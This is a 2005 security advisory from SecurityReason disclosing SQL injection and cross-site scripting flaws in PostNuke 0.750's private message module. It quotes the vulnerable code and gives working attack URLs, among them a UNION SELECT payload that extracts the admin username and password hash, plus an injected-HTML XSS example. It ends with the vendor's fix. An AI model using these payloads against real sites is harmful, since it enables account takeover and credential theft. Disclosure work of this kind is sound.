SecurityReason - Critical SQL injection and XSS in PostNuke ( Research Advisory )

Advisory Text :

-=[ Critical SQL injection and XSS in PostNuke ]=-

Author: sp3x
Date: 27. May 2005

Affected software :
===================
PostNuke version : x=> 0.750

Description :
=============
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system.
PostNuke
is still undergoing development but a large number of core functions are
now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/

Vulnerabilities :
*****************

Critical SQL injection :
========================

Code :
------

/modules/Messages/readpmsg.php

=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
$column[msg_image] AS \"msg_image\",
$column[subject] AS \"subject\",
$column[from_userid] AS \"from_userid\",
$column[to_userid] AS \"to_userid\",
$column[msg_time] AS \"msg_time\",
$column[msg_text] AS \"msg_text\",
$column[read_msg] AS \"read_msg\"
FROM $pntable[priv_msgs]
WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata)
. "'";

$resultID =& $dbconn->SelectLimit($sql,1,$start);
if($dbconn->ErrorNo()<>0) {
error_log("DB Error: " . $dbconn->ErrorMsg());
echo $dbconn->ErrorMsg() . "<br />";
forumerror(0005);
}
=======================

First lets login -in as user in postnuke. Then send the message to
yourself.
After that go to :
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=re
adpmsg&start=0[SQL inj]&total_messages=1

Note :
------
total_messages=1 - the id of total_messages must exist

Now you will see this error message

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '[SQL
injection],1' at line 10
========================

Exploit SQL injection :
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=re
adpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,nu
ll,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1

And we can see the admin md5 password and nick :)

Cross-site scripting - XSS :
============================

Thanks to error message we can also perform XSS attacks :)

Example :
---------

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=re
adpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1

And we get :

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''[Our XSS],1'
at line 10
========================

How to fix :
============

PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.ht
ml
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

Greets :
========

cXIb8O3 and pkw :)

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com